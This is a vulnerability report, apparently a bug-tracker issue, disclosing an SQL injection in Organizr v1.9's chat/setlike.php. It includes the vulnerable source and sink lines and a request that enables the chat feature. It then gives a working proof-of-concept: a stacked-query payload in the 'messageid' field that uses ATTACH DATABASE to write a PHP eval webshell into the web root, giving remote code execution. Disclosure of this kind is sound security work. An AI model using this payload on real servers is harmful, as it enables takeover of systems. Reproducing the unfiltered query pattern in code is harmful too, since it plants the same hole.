SQLI(RCE)_1 in Organizr-v1.9

[xjzzzxx]

Hello,

I would like to report for a Sqli vulnerability in Organizr-v1.9, This vulnerability can lead to RCE.

Analysis

The path of the vulnerability: chat/setlike.php

$messageid = $_POST["messageid"];	// Line 3(Source)
...
$db->exec("UPDATE chatpack_log SET liked='0' WHERE id='$messageid'");  // Line 36(Sink)

There is no checking or filtering between the source and sink, which resulting SQLI vulnerabilities.

Permission Description

The vulnerability itself does not require any permission.(No permissions required)

However, the initial state of Organizer-v1.9 did not enable Chat, causing the data table "chatpack-log" to not exist. To turn on this switch, administrator privileges are required.

You can open it in the management menu or by sending the following request

POST /ajax.php?a=update-config

Data: authType=internal&chat=true

Then visit http://url/chat.php and enter somethings(No permissions required), and Now we got table "chatpack-log".

Poc

POST /chat/setlike.php

Data:

messageid=1'; ATTACH DATABASE 'D:\phpstudy_pro\WWW\cms.organizr19.com\shell.php' AS shell;create TABLE shell.exp (webshell text);insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n' ); /*

Note that we used this vulnerability to write a webshell named shell.php to the server, which actually caused RCE.

Manual verification

[tronyx]

1.X is deprecated, no longer supported, and should not be used.